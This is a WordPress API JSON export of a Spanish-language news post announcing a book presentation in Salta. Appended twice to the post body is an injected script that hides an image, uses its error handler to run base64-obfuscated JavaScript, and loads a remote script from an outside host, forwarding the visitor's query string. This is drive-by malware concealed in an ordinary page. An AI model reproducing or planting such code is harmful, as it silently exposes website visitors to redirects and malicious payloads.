{"id":3753,"date":"2024-02-27T10:15:37","date_gmt":"2024-02-27T13:15:37","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3753"},"modified":"2025-08-13T23:59:51","modified_gmt":"2025-08-14T02:59:51","slug":"se-realizara-la-presentacion-de-una-obra-editada-a-traves-del-fondo-editorial-de-la-provincia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3753","title":{"rendered":"Se realizar\u00e1 la presentaci\u00f3n de una obra editada a trav\u00e9s del Fondo Editorial de la Provincia"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\"><strong><em>Este 1 de marzo a las 19, se presenta el libro \u00abCristales Rotos\u00bb de Marcelo L\u00f3pez Arias, en la Sala Adet del Complejo de Bibliotecas de Salta, Avda. Belgrano 1002<\/em><\/strong><\/h3>\n\n\n\n<p>La presentaci\u00f3n del libro \u00abCristales Rotos\u00bb de Marcelo L\u00f3pez se realizar\u00e1 el viernes 1 de marzo a las 19 hs en la Sala Walter Adet del Complejo de Bibliotecas Salta, Avda. Belgrano 1002. La obra fue editada a trav\u00e9s del Fondo Editorial de la Provincia.<\/p>\n\n\n\n<p>Participar\u00e1n del acto el secretario de Cultura,&nbsp;<strong>Diego Ashur M\u00e1s<\/strong>&nbsp;y miembros de la Sociedad Argentina de Escritores (SADE) filial Salta.<\/p>\n\n\n\n<p>Marcelo L\u00f3pez Arias: Escritor salte\u00f1o, primera menci\u00f3n especial con car\u00e1cter de acc\u00e9sit en el Certamen de Cuentos 1984 de la Provincia de Salta. Diploma otorgado por el Gobierno y Secretar\u00eda de Cultura de la Provincia.<\/p>\n\n\n\n<p>Autor de \u201cRecuerdos de una noche en la terraza y otros cuentos, antolog\u00eda de cuentos\u201d (2014) publicado por la editorial Corregidor, Buenos Aires; y \u201cEl Olvidado y otros cuentos. Antolog\u00eda de Cuentos\u201d publicado por la Editorial Crivelli, Salta (2022).<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-realizara-la-presentacion-de-una-obra-editada-a-traves-del-fondo-editorial-de-la-provincia-94308\" target=\"_blank\" rel=\"noopener\" title=\"Secretar\u00eda de Prensa y Comunicaci\u00f3n\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este 1 de marzo a las 19, se presenta el libro \u00abCristales Rotos\u00bb de Marcelo L\u00f3pez Arias, en la Sala Adet del Complejo de Bibliotecas de Salta, Avda. Belgrano 1002 La presentaci\u00f3n del libro \u00abCristales Rotos\u00bb de Marcelo L\u00f3pez se realizar\u00e1 el viernes 1 de marzo a las 19 hs en la Sala Walter Adet [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3754,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,17],"tags":[],"class_list":{"0":"post-3753","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3753"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3753"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3753\/revisions"}],"predecessor-version":[{"id":6842,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3753\/revisions\/6842"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3754"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3753"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3753"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3753"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}